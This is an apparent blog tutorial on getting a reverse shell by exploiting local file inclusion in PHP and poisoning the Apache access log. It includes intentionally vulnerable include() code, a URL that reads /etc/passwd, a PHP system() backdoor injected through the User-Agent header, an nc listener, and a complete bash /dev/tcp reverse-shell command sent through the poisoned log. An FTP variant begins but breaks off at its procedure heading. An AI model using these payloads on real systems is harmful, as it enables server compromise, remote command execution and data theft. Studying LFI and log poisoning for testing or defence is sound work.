Get Reverse Shell Through Log Poisoning with the Vulnerability of — LFI ( LOCAL FILE INCLUSION )

8 min readDec 25, 2020

Introduction :-

This post is about to get the reverse shell through log poisoning, in this post we are going to discuss about what is Lfi, examples of lfi vulnerable code, how to get reverse shell through Log Poisoning with the lfi vulnerability and practicle also included .

LFI :-

LFI (Local File Inclusion) is a web application vulnerability which occure when an application code take input via GET method or POST method to include any file which are placed over the server without any sanitization of input value , due to which attackers give arbitary inputs in order to theft the confidential information or to get the control over the system.

Example how lfi vulnerable code looks like :-

<?php
echo “file include : “. $_REQUEST[“file”] . “<br />”;
include($_REQUEST[“file”]);
echo “<br />”;
?>

In this example file is included without any sanitization.

Now open the Browser and hit the url :-

http://127.0.0.1/lfi_vuln/lfi-1.php?file=/etc/passwd

You will get the content of the passwd file. This is local file inclusion.

Methods to get the reverse shell :-

UPLOAD:-

On the web application if you get a upload option and know the location of the uploded file then you have to upload the reverse shell file and then go to the folder and execute your reverse shell , mention you ip and port number into the reverse shell file and start the listner [ nc -nlvp port-number] in the terminal and again execute your reverse shell file and you get the shell.

Directory With Permission of write :-

On the web application if we found any directory which have write permission then we have to write a file in that directory and inside the file we provide the code of the reverse shell and save the file to the directory and then execute the file and again turn on the listner in the terminal [ nc -nlvp port-number] and we got the reverse shell.

Log Poisoning :-

The Process of injecting the malicious code into the log file is known as log poisoning.
In our operating system each and every software or application have log file in which all the logs of the application and software are maintaind and its always up-to-date. In log file there is a instant updation done when we perform any activity with the perticular software or application.

If we found the log file in local file inclusion then Log poisoning perform in order to get the reverse shell .

We will cover 1st and 2nd method in another articlein this article we will discuss about the Log Poisoning in detail.

Requirment For Log Poisoning :-

Burp Suite
Log file — which we find through lfi Vuln
Vulnerable php code
Browser

We will Do Log Poisoning with :-

Apache
FTP

APACHE :-

Apache2 — it is a web server

log-file name — access.log

location :- /var/log/apache2/access.log

Apache log file contain details of the useragent.

Example :-

127.0.0.1 — — [23/Dec/2020:00:40:43 +0530] “GET /favicon.ico HTTP/1.1” 404 487 “-” “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”

This type of content are present in the log file of apache web server.
Now we have to inject our malicious code into the log file of apache.

Procedure :-

Make a new file let, lfi-1.php
Open a text editor and write the php code in that file :-

Save the file at the location :- /var/www/html/
Restart your apache server
Now browse your file :-

127.0.0.1/lfi-1.php

If it work properly then it give output like this

Now Check our local file inclusion work poperly or not :-

127.0.0.1/lfi-1.php?file=/etc/passwd

If it give output then our lfi works properly

if you get error of permission denied then for only practicle purpose give them a permission

chmod 644 /etc/passwd

Now we get the log file of apache :-

127.0.0.1/lfi-1.php?file=/var/log/apache2/access.log

If you get this file then we are able to do log poisoning

If you get error of permission denied then for practicle purpose set the permissions

chmod 644 /var/log/apache2/access.log
chmod 755 /var/log/apache2

Configure your Browser Proxy same as given in image
Preferences —Network Setting —

Open your burp suit and go to the proxy section and turn on the intercept

Now brows this in browser :-

127.0.0.1/lfi-1.php?file=/var/log/apache2/access.log

as we know that our intercept is on so our request comes in the burp where we decide what to do with the request

Come to the burp suite and see the request

This is the request of our lfi file.

In this file there is a line in which user agent is given and previous we see that in the log file of apache useragent details are maintaine by apache log file , so we have to give our reverse shell in the user agent section by which it will include in access.log file and then when we execute the access.log file then we get reverse shell.

At the highleted section we give our payload which is a php Backdoor

payload :-

<?php echo system($_GET[‘cmd’]); ?>

Now forward the request

SENERIO :-

In this my ip is :- 192.168.29.45 replace it with our ip

We use port number 443 for reverse shell

Open the termial and turn on the listner on 443 port number . Here we get our reverse shell.

nc -nlvp 443

Again come to the Browser now its time to give the command to get the shell

http://192.168.29.45/lfi-1.php?file=/var/log/apache2/access.log&cmd=/bin/bash -c ‘bash -i > /dev/tcp/192.168.29.45/443 0>%261’

And Finally we get the shell

[+] Points to Remember :

We are able to give only one payload and correct payload in real life application allover we have only one chance .
Always start listner before execute file.
To practise it more time clear the log and restart apache server.
The shell we get from this is temperory shell not a tty shell so we to convert it into a stable/tty shell.

FTP :-

Ftp — File transfer protocol

log-file name — vsftpd.log

location :- /var/log/vsftpd.log

ftp log file contains details of login

FTP log Poisoning is very simple than that of the apache. FTP (FILE TRANSFER PROTOCOL) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.

Procedure :-